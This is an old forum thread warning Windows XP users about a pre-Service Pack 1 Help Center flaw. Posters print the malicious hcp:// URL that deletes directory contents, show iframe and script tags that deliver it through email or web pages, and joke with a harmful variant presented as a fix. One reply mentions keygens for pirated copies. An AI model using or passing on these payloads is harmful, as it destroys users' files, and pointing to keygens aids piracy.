[OT] Attention all Win XP users!

P

Psionicist

Explorer
http://grc.com/xpdite/xpdite.htm

Without XPdite, or XP's Service Pack 1,
clicking on a simple, but malicious, URL can
delete the entire contents of your directories.
This FREE 30 kbyte "XPdite" utility protects your Windows
XP system until you are able to install Service Pack 1.
Click to expand...

Download and install SP1 NOW. Before you do it, run the above 30kb program. This time MS screwed up BADLY!
 

log in or register to remove this ad


Well, I have SP1 installed, so I guess I'm safe from this whatever-it-might-be bug...

Do you happen to know what kind of malicious URL they are speaking of there?

BTW, nice sig, Psi! :)

Bye
Thanee
 

Ahem... notice that if you install SP1, you'll have to agree to the new Microsoft EULA which states, among other things, that you agree to let Microsoft remotely install new software on your machine without warning, which may interfere or block the functioning of other software without them being accountable.

Not counting that, if you're using a pirated WinXP with one of a few leaked activation keys (not that anyone here uses stolen software, right?), chances are that your installation will be deactivated.
 

Thanee said:
Do you happen to know what kind of malicious URL they are speaking of there?
Click to expand...
hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*

I'm not making it clickable for fear that someone will actually click it. Anyway, inserting that into Internet Explorer from a WinXP pre-SP1 computer will delete the content of c:\test.
 
Last edited:


Oddly enough, I started downloading SP1 last night (30 megs is a lot for a 56k modem) and I left it on all night... naturally, I got booted in the middle of it, but it just continued where it left off...


Chris
 


Zappo said:

Not counting that, if you're using a pirated WinXP with one of a few leaked activation keys (not that anyone here uses stolen software, right?), chances are that your installation will be deactivated.
Click to expand...

*shrugs* There are keygens out now, as well as programs to retroactively change your cd key. Not that anyone here uses stolen software, but if they did, they could probably figure out a workaround. :)
 

Yeah. You can technically include this line in a simple email-message and destroy things for someone:

< iframe src="hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*" >

or perhaps

< script language="javascript" src="hcp://system/DFS/uplddrvinfo.htm?file://c:\test\*" >

Or a simple meta redirect tag.

In short, if you use WinXP (unpatched), and read email and view webpages, you are in great danger.

Edit: One should try this to get rid of the problem:
hcp://system/DFS/uplddrvinfo.htm?hcp://system/DFS/uplddrvinfo.htm

haha just kidding :D
 
Last edited:

Similar Threads

Abstruse
Freebies, Sales, and Charity Bundles for December 15, 2024
Replies
4
Views
7K
rknop
rknop
Abstruse
Freebies, Sales, and Charity Bundles for September 8, 2024
Replies
7
Views
5K
GiantBrainStudio
GiantBrainStudio
Abstruse
Freebies, Sales, and Charity Bundles for February 25, 2024
Replies
0
Views
6K
Abstruse
Abstruse
Abstruse
Freebies, Sales, and Charity Bundles for August 20, 2023
Replies
1
Views
6K
Juxtapozbliss
Juxtapozbliss
Abstruse
Freebies, Sales, and Charity Bundles for July 28, 2024
Replies
1
Views
6K
Von Corellon
Von Corellon
Remove ads

Top